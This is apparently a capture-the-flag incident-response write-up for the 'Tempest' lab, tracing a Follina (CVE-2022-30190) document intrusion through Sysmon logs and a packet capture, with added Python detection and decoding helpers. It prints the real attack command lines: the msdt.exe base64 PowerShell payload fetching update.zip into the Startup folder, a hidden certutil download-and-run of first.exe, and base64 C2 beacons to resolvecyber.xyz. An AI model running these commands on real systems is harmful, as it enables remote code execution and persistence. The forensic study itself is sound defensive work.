Tempest


You are tasked to conduct an investigation from a workstation affected by a full attack chain.

Introduction


This room aims to introduce the process of analysing endpoint and network logs from a compromised asset. Given the artefacts, we will aim to uncover the incident from the Tempest machine. In this scenario, you will be tasked to be one of the Incident Responders that will focus on handling and analysing the captured artefacts of a compromised machine.

Prerequisites

Before we start, this room requires basic knowledge of endpoint and network security analysis. It is highly recommended to go through the following rooms before attempting this challenge.

Investigation Environment

For this incident, we have provided a Windows machine at your disposal. You may deploy the machine by clicking the Start Machine button in the upper-right-hand corner of the task.

Note: The machine takes a minute to initialise. You may start accessing it once the IP address has been provided.

The machine will start in a split-screen view. In case the VM is not visible, use the blue Show Split View button at the top-right of the page.

Lastly, you may use the following information if you prefer accessing the machine via RDP:

Machine IP: MACHINE_IP

User: user

Pass: Investigatem3!

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ xfreerdp /v:10.10.253.116 /u:user /p:Investigatem3! /cert:ignore +clipboard /dynamic-resolution /drive:share,/tmp /size:85%

I have successfully connected to the Virtual Machine.

Completed

Preparation - Log Analysis

Before we proceed, let's have a quick refresher regarding these topics, which may help build a methodology for analysing captured events:

  • Log Analysis

  • Event Correlation

Log Analysis

Log analysis is the process of understanding events generated by a computer to identify anomalies such as security threats, application bugs, system performance, or other risks that may impact the organisation.

A log file is an audit trail of events or activities within the applications and systems of an organisation. Logs automatically record whichever activities are configured for auditing, such as system messages, authentication attempts, and generated network traffic. In addition, every log entry carries a timestamp of when the event occurred, which greatly aids an investigation.

Event Correlation

Event correlation identifies significant relationships from multiple log sources, such as application logs, endpoint logs, and network logs.

Event correlation deals with identifying significant artefacts co-existing from different log sources and connecting each related artefact. For example, a network connection log may exist in various log sources, such as Sysmon logs (Event ID 3: Network Connection) and Firewall logs. Firewall logs may provide the source and destination IP, source and destination port, protocol, and the action taken. In contrast, Sysmon logs may give the process that invoked the network connection and the user running the process.

With this information, we can connect the dots of each artefact from the two data sources:

  • Source and Destination IP

  • Source and Destination Port

  • Action Taken

  • Protocol

  • Process name

  • User Account

  • Machine Name

Event correlation can build the puzzle pieces to complete the exact scenario from an investigation.
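As an added illustration of the join described above (example code written for this writeup, not part of the room or of any tool), the Python below enriches constructed pfirewall.log-style entries with the process and user taken from constructed Sysmon Event ID 3 records, matching on the 5-tuple within a small time window. The addresses and timestamps are made up; only the image and user names come from the writeup.

```python
"""Correlate Sysmon Event ID 3 (Network Connection) with firewall entries on the
5-tuple both sources share, so every firewall decision gets its process and user.
Added example for this writeup; it is not part of the room or of any tool."""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

FiveTuple = Tuple[str, int, str, int, str]  # src ip, src port, dst ip, dst port, proto

# Constructed Sysmon Event ID 3 records (field names as Sysmon emits them). The
# addresses and times are made up (TEST-NET ranges); image and user are from the writeup.
SYSMON_EID3 = [
    {"UtcTime": "2022-06-20 17:19:02.917", "Image": r"C:\Users\Public\Downloads\first.exe",
     "User": r"TEMPEST\benimaru", "Protocol": "tcp", "SourceIp": "192.0.2.50",
     "SourcePort": 51812, "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    {"UtcTime": "2022-06-20 17:19:30.104", "Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\NETWORK SERVICE", "Protocol": "udp", "SourceIp": "192.0.2.50",
     "SourcePort": 61002, "DestinationIp": "192.0.2.1", "DestinationPort": 53},
]

# Constructed lines in the Windows Firewall pfirewall.log layout:
# date time action protocol src-ip dst-ip src-port dst-port ... path
FIREWALL_LOG = """\
2022-06-20 17:19:03 ALLOW TCP 192.0.2.50 203.0.113.10 51812 80 0 - 0 0 0 - - - SEND
2022-06-20 17:19:03 DROP TCP 198.51.100.7 192.0.2.50 40211 445 0 - 0 0 0 - - - RECEIVE
2022-06-20 17:19:31 ALLOW UDP 192.0.2.50 192.0.2.1 61002 53 0 - 0 0 0 - - - SEND
"""


def parse_firewall(text: str) -> List[dict]:
    """Parse pfirewall.log lines; header lines start with '#'."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 8 or f[0].startswith("#"):
            continue
        rows.append({"time": datetime.fromisoformat(f"{f[0]} {f[1]}"), "action": f[2],
                     "proto": f[3].lower(), "src": f[4], "dst": f[5],
                     "sport": int(f[6]), "dport": int(f[7]), "direction": f[-1]})
    return rows


def fw_key(r: dict) -> FiveTuple:
    return (r["src"], r["sport"], r["dst"], r["dport"], r["proto"])


def sysmon_key(e: dict) -> FiveTuple:
    return (e["SourceIp"], e["SourcePort"], e["DestinationIp"], e["DestinationPort"],
            e["Protocol"].lower())


def correlate(sysmon: List[dict], firewall: List[dict],
              tolerance: timedelta = timedelta(seconds=5)):
    """Join on the 5-tuple. The two clocks rarely agree to the millisecond, so a
    firewall entry counts if it lies within `tolerance` of the Sysmon UtcTime.
    Both sources are assumed to be in UTC here; a real pfirewall.log is local time."""
    by_key: Dict[FiveTuple, List[dict]] = {}
    for r in firewall:
        by_key.setdefault(fw_key(r), []).append(r)
    merged, unmatched_sysmon, matched_fw = [], [], set()
    for e in sysmon:
        t = datetime.fromisoformat(e["UtcTime"])
        hits = [r for r in by_key.get(sysmon_key(e), []) if abs(r["time"] - t) <= tolerance]
        if not hits:
            unmatched_sysmon.append(e)  # firewall never saw it: a blind spot to report
        for r in hits:
            matched_fw.add(id(r))
            merged.append({**r, "image": e["Image"], "user": e["User"], "utc": e["UtcTime"]})
    # Firewall entries with no Sysmon process: inbound drops, or connections from a
    # process Sysmon did not record (a visibility gap worth stating in the report).
    unmatched_fw = [r for r in firewall if id(r) not in matched_fw]
    return merged, unmatched_sysmon, unmatched_fw


if __name__ == "__main__":
    merged, no_fw, no_proc = correlate(SYSMON_EID3, parse_firewall(FIREWALL_LOG))
    for m in merged:
        print(f'{m["utc"]} {m["action"]:5} {m["proto"]} {m["src"]}:{m["sport"]} -> '
              f'{m["dst"]}:{m["dport"]} {m["image"]} ({m["user"]})')
    print(f"{len(no_fw)} Sysmon event(s) without a firewall entry, "
          f"{len(no_proc)} firewall entries without a process")
```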

Answer the questions below

I have read and understood the concept of Log Analysis and Event Correlation.

Completed

Preparation - Tools and Artifacts

In this task, we will prepare the artefacts and introduce the tools needed for the investigation.

Compare by hash

Before conducting the investigation, one of the most important steps is to compare the artefacts by their hashes. It is common practice to verify that the artefacts are intact and exactly what was expected.

You can get the hash of each artefact by running PowerShell from the taskbar and executing the following commands:

powershell.exe

PS C:\Users\user> cd '.\Desktop\Incident Files\'

powershell.exe

PS C:\Users\user\Desktop\Incident Files> ls


    Directory: C:\Users\user\Desktop\Incident Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/21/2022   1:46 AM       17479060 capture.pcapng
-a----        6/21/2022   1:30 AM        3215360 sysmon.evtx
-a----        6/21/2022   1:29 AM        1118208 windows.evtx

powershell.exe

PS C:\Users\user\Desktop\Incident Files> Get-FileHash -Algorithm SHA256 .\capture.pcapng

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6       C:\Users\user\...

Toolset

The toolset needed for this task is focused on analysing Sysmon Logs, Windows Event Logs, and Packet Capture.

Endpoint Logs

To analyse Windows artefacts such as Windows Event Logs and Sysmon logs, we will use the following tools:

  • EvtxEcmd

  • Timeline Explorer

  • SysmonView

  • Event Viewer

Network Logs

To analyse the provided packet capture, we will use the following tools:

  • Wireshark

  • Brim

Note: You can access the tools listed above via the taskbar.

Since some of the tools listed above, such as Wireshark, Brim and Event Viewer, are already covered by the prerequisite rooms, we will only cover the new ones in this section.

EvtxEcmd & Timeline Explorer

EvtxEcmd is a command-line tool which parses Windows Event Logs into different formats such as CSV, JSON and XML. You may use this tool in conjunction with Timeline Explorer, created by the same author. Timeline Explorer is a GUI-based tool for filtering and navigating data that helps incident responders work with the raw output.

To parse the provided logs, we first need to convert the EVTX logs into CSV using EvtxEcmd and then load the result into Timeline Explorer.

powershell.exe

PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
EvtxECmd version 1.0.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/evtx

Command line: -f C:\Users\user\Desktop\Incident Files\sysmon.evtx --csv C:\Users\user\Desktop\Incident Files --csvf sysmon.csv

Warning: Administrator privileges not found!

CSV output will be saved to C:\Users\user\Desktop\Incident Files\sysmon.csv

Maps loaded: 383

Processing C:\Users\user\Desktop\Incident Files\sysmon.evtx...
Chunk count: 42, Iterating records...

Event log details
Flags: None
Chunk count: 42
Stored/Calculated CRC: EAFDE57A/EAFDE57A
Earliest timestamp: 1601-01-01 00:00:00.0000000
Latest timestamp:   2022-06-20 17:30:35.3630890
Total event log records found: 2,559

Records included: 2,559 Errors: 0 Events dropped: 0

Metrics (including dropped events)
Event ID        Count
1               238
2               2
3               92
5               3
8               3
11              1,024
12              186
13              869
15              6
22              136

Processed 1 file in 19.8850 seconds

For TimelineExplorer.exe, we can load the exported CSV file by doing the following: File > Open > choose sysmon.csv from the C:\Users\user\Desktop\Incident Files directory.

Once the logs are loaded, you may navigate through each column and use the input field to filter specific logs via a unique string.

Lastly, you may use the search feature in the upper right-hand corner to find a unique string that may exist on any column.

SysmonView

SysmonView is a Windows GUI-based tool that visualises Sysmon Logs.

Before using this tool, we must export the log file's contents into XML via Event Viewer.

The machine will notify you once the file has been successfully exported.

Usage:

  • Go to File > Import Sysmon Event Logs then choose the XML files generated using the Event Viewer.

  • Once loaded, the left sidebar has a search function that can filter for a specific process.

  • Choose the image path and session GUID to render the mapped view.

This tool makes it easy to view the correlated events of a specific process. The example above summarises all Sysmon events related to explorer.exe.

Answer the questions below

PS C:\Users\user\Desktop\Incident Files> Get-FileHash -Algorithm SHA256 *

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6       C:\Users\user\Desktop\Incident Files\capture.pcapng
SHA256          665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F       C:\Users\user\Desktop\Incident Files\sysmon.evtx
SHA256          D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60       C:\Users\user\Desktop\Incident Files\windows.evtx

using Eric Zimmerman's tools

PS C:\Users\user\Desktop\Incident Files> cd 'C:\Tools\EvtxECmd'
PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv
Required argument missing for option: '--csv'.

Description:
  EvtxECmd version 1.0.0.0

  Author: Eric Zimmerman (saericzimmerman@gmail.com)
  https://github.com/EricZimmerman/evtx

  Examples: EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out" --csvf MyOutputFile.csv
            EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out"
            EvtxECmd.exe -f "C:\Temp\Application.evtx" --json "c:\temp\jsonout"

            Short options (single letter) are prefixed with a single dash. Long commands are prefixed with two dashes

Usage:
  EvtxECmd [options]

Options:
  -f <f>           File to process. This or -d is required
  -d <d>           Directory to process that contains evtx files. This or -f is required
  --csv <csv>      Directory to save CSV formatted results to
  --csvf <csvf>    File name to save CSV formatted results to. When present, overrides default name
  --json <json>    Directory to save JSON formatted results to
  --jsonf <jsonf>  File name to save JSON formatted results to. When present, overrides default name
  --xml <xml>      Directory to save XML formatted results to
  --xmlf <xmlf>    File name to save XML formatted results to. When present, overrides default name
  --dt <dt>        The custom date/time format to use when displaying time stamps [default: yyyy-MM-dd HH:mm:ss.fffffff]
  --inc <inc>      List of Event IDs to process. All others are ignored. Overrides --exc Format is 4624,4625,5410
  --exc <exc>      List of Event IDs to IGNORE. All others are included. Format is 4624,4625,5410
  --sd <sd>        Start date for including events (UTC). Anything OLDER than this is dropped. Format should match --dt
  --ed <ed>        End date for including events (UTC). Anything NEWER than this is dropped. Format should match --dt
  --fj             When true, export all available data when using --json [default: False]
  --tdt <tdt>      The number of seconds to use for time discrepancy detection [default: 1]
  --met            When true, show metrics about processed event log [default: True]
  --maps <maps>    The path where event maps are located. Defaults to 'Maps' folder where program was executed
                   [default: C:\Tools\EvtxECmd\Maps]
  --vss            Process all Volume Shadow Copies that exist on drive specified by -f or -d [default: False]
  --dedupe         Deduplicate -f or -d & VSCs based on SHA-1. First file found wins [default: True]
  --sync           If true, the latest maps from https://github.com/EricZimmerman/evtx/tree/master/evtx/Maps are
                   downloaded and local maps updated [default: False]
  --debug          Show debug information during processing [default: False]
  --trace          Show trace information during processing [default: False]
  --version        Show version information
  -?, -h, --help   Show help and usage information


PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
EvtxECmd version 1.0.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/evtx

Command line: -f C:\Users\user\Desktop\Incident Files\sysmon.evtx --csv C:\Users\user\Desktop\Incident Files --csvf sysmon.csv

Warning: Administrator privileges not found!

CSV output will be saved to C:\Users\user\Desktop\Incident Files\sysmon.csv

Maps loaded: 383

Processing C:\Users\user\Desktop\Incident Files\sysmon.evtx...
Chunk count: 42, Iterating records...

Event log details
Flags: None
Chunk count: 42
Stored/Calculated CRC: EAFDE57A/EAFDE57A
Earliest timestamp: 1601-01-01 00:00:00.0000000
Latest timestamp:   2022-06-20 17:30:35.3630890
Total event log records found: 2,559

Records included: 2,559 Errors: 0 Events dropped: 0

Metrics (including dropped events)
Event ID        Count
1               238
2               2
3               92
5               3
8               3
11              1,024
12              186
13              869
15              6
22              136

Processed 1 file in 7.3504 seconds

Now we can proceed with TimelineExplorer.exe

Computer TEMPEST

Now using SysmonView

we must export the log file's contents into XML via Event Viewer

wait until you get a success message


What is the SHA256 hash of the capture.pcapng file?

CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6

What is the SHA256 hash of the sysmon.evtx file?

665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F

What is the SHA256 hash of the windows.evtx file?

D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60

Initial Access - Malicious Document

Tempest Incident

In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.

As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:

  • The malicious document has a .doc extension.

  • The user downloaded the malicious document via chrome.exe.

  • The malicious document then executed a chain of commands to attain code execution.

Investigation Guide

To aid with the investigation, you may refer to the cheatsheet crafted by the team applicable to this scenario:

  • Start with the events generated by Sysmon.

  • EvtxEcmd, Timeline Explorer, and SysmonView can interpret Sysmon logs.

  • Follow the child processes of WinWord.exe.

  • Use filters such as ParentProcessID or ProcessID to correlate the relationship of each process.

  • We can focus on Sysmon events such as Process Creation (Event ID 1) and DNS Queries (Event ID 22) to correlate the activity generated by the malicious document.

Significant Data Sources:

  • Sysmon

Answer the questions below

Using Timeline Explorer
search for WinWord.exe

{"EventData":{"Data":[{"@Name":"RuleName","#text":"Downloads"},{"@Name":"UtcTime","#text":"2022-06-20 17:13:14.228"},{"@Name":"ProcessGuid","#text":"4bbef3ae-aaa8-62b0-2e0a-000000000700"},{"@Name":"ProcessId","#text":"496"},{"@Name":"Image","#text":"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE"},{"@Name":"TargetFilename","#text":"C:\\Users\\benimaru\\Downloads\\~$ee_magicules.doc"},{"@Name":"CreationUtcTime","#text":"2022-06-20 17:13:14.228"},{"@Name":"User","#text":"TEMPEST\\benimaru"}]}}

DestinationIp: 167.71.199.191

QueryName: phishteam.xyz

There's an easy way: just search for base64 :)

C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

Look at ms-msdt

┌──(witty㉿kali)-[~/Downloads]
└─$ echo "JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==" | base64 -d
$app=[Environment]::GetFolderPath('ApplicationData');cd "$app\Microsoft\Windows\Start Menu\Programs\Startup"; iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip; Expand-Archive .\update.zip -DestinationPath .; rm update.zip;

https://superuser.com/questions/1727392/follina-msdt-vuln-cve-2022-30190-who-is-executing-the-powershell-cvommand

https://wazuh.com/blog/detecting-follina-cve-2022-30190-attack-with-wazuh/

Follina
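An added example (not part of the room or of this writeup) in Python that flags the msdt.exe command line above the way a detection rule would and recovers the PowerShell from the [char]34-wrapped base64 argument, reproducing the base64 -d step by hand. The command-line constant is copied from the Sysmon event quoted above; the benign msdt.exe invocation is constructed.

```python
"""Triage a Sysmon Event ID 1 command line for the Follina (CVE-2022-30190)
msdt.exe pattern and recover the PowerShell it hides in base64.
Added example for this writeup; it is not part of the room or of any tool."""
import base64
import re
from typing import Optional

# The encoded payload exactly as it appears in the Sysmon event quoted in the writeup.
ENCODED = ("JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==")

# The full CommandLine from the same event. [char]34 is '"' and [char]58 is ':',
# assembled at run time so the quoted string never appears literally in the document.
FOLLINA_CMDLINE = (
    r"""C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'"""
    + ENCODED
    + "'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""
)

# A legitimate troubleshooter launch (constructed) that must not be flagged.
BENIGN_CMDLINE = r"C:\Windows\System32\msdt.exe -id PCWDiagnostic"

# Hallmarks of the abuse: the ms-msdt: URI scheme plus a PowerShell
# subexpression smuggled into the IT_BrowseForFile parameter.
MSDT_INDICATORS = ("ms-msdt:", "PCWDiagnostic", "IT_BrowseForFile=$(")

# The specific quoting construct seen here, then a fallback for any long base64 run.
B64_ARG_RE = re.compile(r"FromBase64String\('\+\[char\]34\+'([A-Za-z0-9+/=]+)'")
LONG_B64_RE = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{40,}={0,2})(?![A-Za-z0-9+/])")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def is_follina_cmdline(cmdline: str) -> bool:
    """True when msdt.exe is launched with every indicator present (case-insensitive)."""
    low = cmdline.lower()
    return "msdt.exe" in low and all(i.lower() in low for i in MSDT_INDICATORS)


def decode_embedded_b64(cmdline: str) -> Optional[str]:
    """Pull the base64 handed to FromBase64String and decode it as UTF-8."""
    m = B64_ARG_RE.search(cmdline) or LONG_B64_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(cmdline: str) -> dict:
    """Verdict plus the decoded stage-2 script and the URLs it fetches."""
    flagged = is_follina_cmdline(cmdline)
    decoded = decode_embedded_b64(cmdline) if flagged else None
    return {"follina": flagged, "decoded": decoded,
            "urls": URL_RE.findall(decoded) if decoded else []}


if __name__ == "__main__":
    for c in (FOLLINA_CMDLINE, BENIGN_CMDLINE):
        print(triage(c))
```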

The user of this machine was compromised by a malicious document. What is the file name of the document?

ee_magicules.doc

What is the name of the compromised user and machine?

Format: username-machine name

benimaru-TEMPEST

What is the PID of the Microsoft Word process that opened the malicious document?

496

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?

167.71.199.191

What is the base64 encoded string in the malicious payload executed by the document?

*JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==*

What is the CVE number of the exploit used by the attacker to achieve a remote code execution?

External research needed. Observe the parent-child relationship of Winword.exe and the process that executed the malicious base64 payload.

Format: XXXX-XXXXX

2022-30190

Initial Access - Stage 2 execution

Malicious Document - Stage 2

Based on the initial findings, we discovered that there is a stage 2 execution:

  • The document has successfully executed an encoded base64 command.

  • Decoding this string reveals the exact command chain executed by the malicious document.

Investigation Guide

With the following discoveries, we may refer again to the cheatsheet to continue with the investigation:

  • The Autostart execution reflects explorer.exe as its parent process ID.

  • Child processes of explorer.exe within the event timeframe could be significant.

  • Process Creation (Event ID 1) and File Creation (Event ID 11) succeeding the document execution are worth checking.

Significant Data Sources:

  • Sysmon

Answer the questions below

appdata environment variable

The default value of the environment variable APPDATA is **C:\Users\username\AppData\Roaming**.

C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

search for explorer.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

filter by Event ID 1, then search for first.exe

"C:\Users\Public\Downloads\first.exe"

MD5=C9AA36F483B61CFA9758C44ACDB776AC,SHA256=CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2

remove the Event ID 1 filter, then search for first.exe

QueryName: resolvecyber.xyz

now we need to know which port it uses

using Brim & Wireshark

upload capture.pcapng

Query HTTP requests

_path=="http" | cut id.orig_h, id.resp_h, id.resp_p, method, host, uri | uniq -c

and filter by

_path=="http" "resolvecyber.xyz" | cut id.orig_h, id.resp_h, id.resp_p, method, host, uri | uniq -c 

there are 2 ports: 8080 and 80

resolvecyber.xyz:80


The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?

The AppData environment variable can be simplified.

*C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup*

The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?

Format: Remove the double quotes from the log.

*"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe*

Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?

CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?

Format: domain:port

resolvecyber.xyz:80

Initial Access - Malicious Document Traffic

Malicious Document Traffic

Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:

  • We discovered the Domain and IP invoked by the malicious document on Sysmon logs.

  • There is another domain and IP used by the stage 2 payload logged from the same data source.

Investigation Guide

Since we have discovered network-related artefacts, we may again refer to our cheatsheet, which focuses on Network Log Analysis:

  • We can now use Brim and Wireshark to investigate the packet capture.

  • Find network events related to the harvested domains and IP addresses.

  • Sample Brim filter that you can use for this investigation: _path=="http" "<malicious domain>"

Data Sources:

  • Packet Capture

Answer the questions below

/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K

decoded from base64

pwd - 
Path               
----               
C:\Windows\system32

_path=="http" "phishteam.xyz" | sort ts

host
phishteam.xyz
uri
/02dcf07/index.html

http://phishteam.xyz/02dcf07/index.html

_path=="http" "resolvecyber.xyz" 

?q=

method
GET
host
resolvecyber.xyz
uri
/9ab62b5?q=bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYX

Nim httpclient/1.6.6
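Added example (not part of the room or of this writeup): a Python decoder for the q= beacons, run over constructed records in the shape of Brim's cut ts, host, id.resp_p, uri output. The three q= values are copied from this writeup (including the cut-off one above), host, port and path come from the findings, and the timestamps are made up. The same decoder handles the enumeration output decoded in the Internal Reconnaissance task further down.

```python
"""Decode the base64 beacons the Nim C2 client puts in the q= query parameter,
rebuilding the attacker's command/output session from HTTP records.
Added example for this writeup; it is not part of the room or of any tool."""
import base64
import binascii
from typing import List, NamedTuple, Optional
from urllib.parse import unquote, urlsplit

C2_HOST = "resolvecyber.xyz"  # domain from the Sysmon DNS query and Brim http records
C2_PORT = 80
C2_PATH = "/9ab62b5"          # URL the binary polls for its next command

# Constructed records in the shape of Brim's `cut ts, host, id.resp_p, uri` output.
# Timestamps are made up; the three q= values are copied from this writeup (the
# last one is the cut-off string shown above and exercises the padding repair).
HTTP_RECORDS = [
    ("2022-06-20T17:14:01Z", "phishteam.xyz", 80, "/02dcf07/index.html"),
    ("2022-06-20T17:19:03Z", C2_HOST, C2_PORT,
     "/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K"),
    ("2022-06-20T17:19:10Z", C2_HOST, C2_PORT,
     "/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K"),
    ("2022-06-20T17:20:45Z", C2_HOST, C2_PORT, "/9ab62b5?q=bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYX"),
]


class Beacon(NamedTuple):
    ts: str
    command: str
    output: str
    truncated: bool


def query_param(uri: str, name: str) -> Optional[str]:
    """Return one query value with percent-decoding only. parse_qs() would map
    '+' to ' ' and silently corrupt base64, so split the query by hand."""
    for part in urlsplit(uri).query.split("&"):
        key, _, value = part.partition("=")
        if key == name:
            return unquote(value)
    return None


def decode_b64_lenient(s: str) -> Optional[bytes]:
    """Base64-decode after restoring padding that a cut-off or copy may have lost."""
    s = s.strip()
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except binascii.Error:
        return None


def parse_beacon(ts: str, raw: bytes, truncated: bool) -> Beacon:
    """The client formats every beacon as '<command> - <output>'."""
    text = raw.decode("utf-8", errors="replace")
    command, sep, output = text.partition(" - ")
    if not sep:  # separator never arrived: the record was cut short
        return Beacon(ts, text.strip(), "", True)
    return Beacon(ts, command.strip(), output.replace("\r\n", "\n").strip(), truncated)


def reconstruct_session(records, host=C2_HOST, port=C2_PORT, path=C2_PATH) -> List[Beacon]:
    """Keep only requests to the C2 path on the C2 host/port and decode them in order."""
    beacons = []
    for ts, rec_host, resp_p, uri in sorted(records):
        if rec_host != host or resp_p != port or urlsplit(uri).path != path:
            continue
        q = query_param(uri, "q")
        if q is None:
            continue
        raw = decode_b64_lenient(q)
        if raw is not None:
            beacons.append(parse_beacon(ts, raw, truncated=len(q) % 4 != 0))
    return beacons


if __name__ == "__main__":
    for b in reconstruct_session(HTTP_RECORDS):
        flag = "  [truncated]" if b.truncated else ""
        print(f"{b.ts}  > {b.command}{flag}")
        for line in b.output.splitlines():
            print(f"            {line}")
```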

What is the URL of the malicious payload embedded in the document?

*http://phishteam.xyz/02dcf07/index.html*

What is the encoding used by the attacker on the c2 connection?

base64

